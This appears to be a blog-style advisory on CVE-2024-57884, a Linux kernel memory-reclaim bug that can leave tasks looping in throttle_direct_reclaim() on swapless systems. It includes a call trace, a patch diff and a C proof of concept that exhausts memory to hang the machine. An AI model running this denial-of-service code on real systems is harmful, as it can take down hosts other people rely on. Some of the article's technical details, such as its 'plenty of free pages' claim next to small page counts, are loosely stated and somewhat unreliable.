CVE-2024-57884 - Preventing Infinite Reclaim Loops in Linux Kernel’s Memory Management (`throttle_direct_reclaim`)

A critical resource management bug in the Linux kernel's memory management subsystem has historically allowed a task to become stuck in throttle_direct_reclaim(), looping endlessly due to faulty accounting of a zone's reclaimable pages. The issue, tracked as CVE-2024-57884, can lead to a system hang in specific low-memory scenarios, especially on swapless systems. Here, we break down how the bug happens, its practical impact, and how a subtle patch resolved the root cause.

The Vulnerability Explained

The Linux kernel divides available memory into zones (like ZONE_DMA32, ZONE_NORMAL). The page allocator and memory reclaim logic try to balance free memory across these zones using a suite of functions, including throttle_direct_reclaim().

Sometimes, a process requesting more memory (e.g., via malloc() or paging in an anonymous page) triggers direct reclamation—where the process itself tries to free memory. This is managed by the throttle_direct_reclaim() function.

The Problem: An Infinite Loop

If the kernel decides that _no reclaimable pages are available_ in a zone, and the system lacks swap (so anonymous pages cannot be swapped out), faulty accounting can make the zone look "unreclaimable." As a result, one or more zones may be skipped even when they hold plenty of free pages above their high watermark. A process that hits this path in the allocator enters a loop that never ends, as shown in this call trace:

 #0 [ffff80002cb6f8d0] __switch_to             at ffff8000080095ac
 #1 [ffff80002cb6f900] __schedule              at ffff800008abbd1c
 #2 [ffff80002cb6f990] schedule                at ffff800008abc50c
 #3 [ffff80002cb6f9b0] throttle_direct_reclaim at ffff800008273550
 #4 [ffff80002cb6fa20] try_to_free_pages       at ffff800008277b68
 #5 [ffff80002cb6fae0] __alloc_pages_nodemask  at ffff8000082c4660
 #6 [ffff80002cb6fc50] alloc_pages_vma         at ffff8000082e4a98
 #7 [ffff80002cb6fca0] do_anonymous_page       at ffff80000829f5a8
 #8 [ffff80002cb6fce0] __handle_mm_fault       at ffff8000082a5974
 #9 [ffff80002cb6fd90] handle_mm_fault         at ffff8000082a5bd4

In this situation, allow_direct_reclaim(pgdat) always returns false, so the process never escapes the reclaim throttle. Meanwhile, the kswapd_failures counter is never incremented, masking the real memory pressure on the affected zones.

This was observed directly in production, with the following pgdat and zone stats (abridged for clarity):

NODE: 4  ZONE: 0  NAME: "DMA32"   NR_FREE_PAGES: 359
NODE: 4  ZONE: 1  NAME: "Normal"  NR_FREE_PAGES: 146
No swap present (nr_swap_pages = 0)
DMA32 zone seen as unreclaimable, despite its free pages.

Diagnosis

The function zone_reclaimable_pages() computed _zero_ reclaimable pages whenever a zone held no file-backed or anonymous LRU pages, because it never counted the zone's free pages (NR_FREE_PAGES). Higher-level logic therefore treated such zones as unreclaimable, skipping them and never advancing the fail counter (kswapd_failures). While the node as a whole had enough memory, individual _zones_ could suffer, sending processes into reclaim-loop purgatory.

Exploit Example

A local unprivileged process can trigger the bug by starving ZONE_NORMAL while plenty of memory sits unused in another zone (such as ZONE_DMA32). The process keeps allocating and touching memory until it hits the reclaim path. If swap is off and the conditions above hold, the process (and likely the whole system) will hang.

Here’s a simplified PoC (Proof of Concept) in C. Warning: This can hang your system!

// Only run on VM/test system!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    size_t size = 256 * 1024 * 1024; // 256 MB per block
    char **blocks = NULL;
    int i = 0;

    blocks = malloc(1024 * sizeof(*blocks));
    if (!blocks) return 1;

    while (i < 1024) {
        blocks[i] = malloc(size);
        if (!blocks[i]) break;
        // Touch every page to force actual allocation
        for (size_t j = 0; j < size; j += 4096) {
            blocks[i][j] = 0xAA;
        }
        i++;
        usleep(10000);
    }

    printf("Allocated %d blocks of %zu bytes\n", i, size);
    return 0;
}

*This code will allocate memory endlessly. On swapless servers, this can make the kernel hang, reproducing the bug.*

The Patch

The fix consists of including free pages (NR_FREE_PAGES) in the count when zone_reclaimable_pages() would otherwise report zero. This prevents the infinite loop by letting the rest of the reclaim infrastructure see that plenty of free pages actually exist in a zone.

Patch Example

@@ mm/vmscan.c @@
-static unsigned long zone_reclaimable_pages(struct zone *zone)
-{
-    return zone_page_state_snapshot(zone, NR_ZONE_RECLAIMABLE);
-}
+static unsigned long zone_reclaimable_pages(struct zone *zone)
+{
+    unsigned long reclaimed = zone_page_state_snapshot(zone, NR_ZONE_RECLAIMABLE);
+    if (reclaimed == 0)
+        reclaimed = zone_page_state_snapshot(zone, NR_FREE_PAGES);
+    return reclaimed;
+}

The critical change ensures no zone is deemed “dead” if it still has free pages left.

Upstream Details & References

- Linux Kernel Commit Fix
- CVE-2024-57884 on NVD
- Linux mm mailing list discussion
- Source: mm: vmscan: account for free pages to prevent infinite Loop in throttle_direct_reclaim()

Detect

- If the system locks up during memory pressure and swap is off, check for tasks stuck in throttle_direct_reclaim in crash dumps or via kernel stack traces.

Remediate

- Upgrade to a kernel that includes the fix above; it has been merged upstream and backported to the maintained stable series.

Conclusion

CVE-2024-57884 shows that even small accounting errors can have major consequences on system stability, especially for swapless servers and embedded devices with tight memory budgets. Keeping up with kernel updates and being aware of memory zone behavior is essential for Linux sysadmins and low-level developers alike.

Stay patched and stay safe!


Timeline

Published on: 01/15/2025 13:15:12 UTC
Last modified on: 05/04/2025 10:05:50 UTC